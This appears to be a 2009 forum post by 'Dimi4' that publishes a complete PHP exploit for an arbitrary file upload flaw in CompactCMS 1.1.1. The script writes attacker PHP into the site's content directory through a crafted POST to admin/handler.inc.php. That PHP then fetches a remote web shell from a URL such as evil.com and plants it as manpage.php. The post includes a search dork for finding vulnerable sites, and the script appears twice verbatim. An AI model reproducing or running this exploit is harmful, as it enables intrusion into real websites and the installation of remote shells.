Dimi4
09.04.2009, 09:25
CompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
<?php
/**
* @Product: MMIX - CompactCMS
* @Version: 1.1.1
* @Site: CompactCMS.nl
* @Dork: "© 2009 CompactCMS"
* @Found by: Dimi4
* @Date: 8.04.2009
* @Greetz: antichat, UASC[http://uasc.org.ua]
* @Bug Function [admin\handler.inc.php] [50-62 lines] :
* */
/////////////////////////////////////////////////////////////////////
## $name = htmlentities($_GET['file']); #
## $content = $_POST['content']; #
## $filename = "../content/".htmlentities($_GET['file']).".php"; #
## #
## if (is_writable($filename)) { #
## if (!$handle = fopen($filename, 'w')) { #
## echo "[ERR105] ".$sw_err02." (".$filename.")."; #
## exit; #
## } #
## if (fwrite($handle, $content) === FALSE) { #
## echo "[ERR106] ".$sw_err03." (".$filename.")."; #
## exit; #
## } #
////////////////////////////////////////////////////////////////////
error_reporting(0);
set_time_limit(0);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
socket_write($s, $packet, strlen($packet));
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
function help()
{
global $argv;
echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
die();
}
if ($argv[1] == "") {
help();
die();
}
$host = $argv[1];
$path = $argv[2];
$shell = $argv[3];
$login = $argv[4];
$pass = $argv[5];
$tmpshell = "1123";
$shellname = "manpage.php";
$payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n";
echo("
------------------------------------------------------------------
\tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
------------------------------------------------------------------\n\n");
echo("**\t Coded by Dimi4, greetz Antichat\n\n");
echo ("[+] Connecting to {$host}...\n");
$packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
if(!empty($login) && !empty($pass))
{
$packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;
$response = http_send($host, $packet);
//echo ($response);
if (preg_match("/WWW-Authenticate/i", $response))
{
die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
}
else
{
echo ("[+] Sending Payload...\n");
echo ("[+] Downloading shell...\n");
if(!file_get_contents($shell))
{
echo ("\t[!] Warning! Can't Download shell!\n");
$warning = "Maybe";
}
echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
die();
}
?>
<?php
/**
* @Product: MMIX - CompactCMS
* @Version: 1.1.1
* @Site: CompactCMS.nl
* @Dork: "© 2009 CompactCMS"
* @Found by: Dimi4
* @Date: 8.04.2009
* @Greetz: antichat, UASC[http://uasc.org.ua]
* @Bug Function [admin\handler.inc.php] [50-62 lines] :
* */
/////////////////////////////////////////////////////////////////////
## $name = htmlentities($_GET['file']); #
## $content = $_POST['content']; #
## $filename = "../content/".htmlentities($_GET['file']).".php"; #
## #
## if (is_writable($filename)) { #
## if (!$handle = fopen($filename, 'w')) { #
## echo "[ERR105] ".$sw_err02." (".$filename.")."; #
## exit; #
## } #
## if (fwrite($handle, $content) === FALSE) { #
## echo "[ERR106] ".$sw_err03." (".$filename.")."; #
## exit; #
## } #
////////////////////////////////////////////////////////////////////
error_reporting(0);
set_time_limit(0);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
socket_write($s, $packet, strlen($packet));
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
function help()
{
global $argv;
echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
die();
}
if ($argv[1] == "") {
help();
die();
}
$host = $argv[1];
$path = $argv[2];
$shell = $argv[3];
$login = $argv[4];
$pass = $argv[5];
$tmpshell = "1123";
$shellname = "manpage.php";
$payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n";
echo("
------------------------------------------------------------------
\tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
------------------------------------------------------------------\n\n");
echo("**\t Coded by Dimi4, greetz Antichat\n\n");
echo ("[+] Connecting to {$host}...\n");
$packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
if(!empty($login) && !empty($pass))
{
$packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;
$response = http_send($host, $packet);
//echo ($response);
if (preg_match("/WWW-Authenticate/i", $response))
{
die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
}
else
{
echo ("[+] Sending Payload...\n");
echo ("[+] Downloading shell...\n");
if(!file_get_contents($shell))
{
echo ("\t[!] Warning! Can't Download shell!\n");
$warning = "Maybe";
}
echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
die();
}
?>